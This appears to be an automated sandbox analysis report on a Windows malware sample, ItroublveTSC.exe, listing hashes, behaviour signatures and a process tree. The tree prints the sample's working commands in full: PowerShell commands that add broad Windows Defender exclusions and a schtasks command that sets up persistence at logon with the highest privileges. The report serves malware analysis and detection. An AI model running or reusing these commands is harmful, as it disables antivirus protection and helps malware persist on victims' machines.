Analysis
-
max time kernel
30s -
max time network
33s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-12-2024 02:20
Static task
static1
Behavioral task
behavioral1
Sample
ItroublveTSC.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
ItroublveTSC.exe
Resource
win10v2004-20241007-en
General
-
Target
ItroublveTSC.exe
-
Size
2.4MB
-
MD5
b5915bb34f01bad573a6cc0c314b9b8b
-
SHA1
8b10c4cbdf11fc016d9a48c79afd3ac05a13939d
-
SHA256
51353852176f069b6ab794f567a7cc2064341c8b80d9dd4ba0cfd8ca9948ae35
-
SHA512
6559d86bd6970a07c31c4fa330f41a50136b6d0abfa14e3782f5eaff1cbdfc9a1f39b3f1af4d2c0d181a7c83b73145a68ac54452ac21fe8f9584c47d9ac173c1
-
SSDEEP
49152:TAbfHjnTDRqfevVL3DfQ3QUzbzO9ayYaPSPFcKKiNixScEU4a3/B3D:TiPAfevVL3bQRO8Ea9csExN/r53D
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 920 powershell.exe 4380 powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5004 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3432 conhost.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3432 conhost.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 4860 wrote to memory of 3432 4860 ItroublveTSC.exe 100 PID 4860 wrote to memory of 3432 4860 ItroublveTSC.exe 100 PID 4860 wrote to memory of 3432 4860 ItroublveTSC.exe 100 PID 3432 wrote to memory of 2948 3432 conhost.exe 101 PID 3432 wrote to memory of 2948 3432 conhost.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\ItroublveTSC.exe"C:\Users\Admin\AppData\Local\Temp\ItroublveTSC.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\ItroublveTSC.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵PID:2948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Command and Scripting Interpreter: PowerShell
PID:920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Command and Scripting Interpreter: PowerShell
PID:4380
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"3⤵PID:1484
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:5004
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82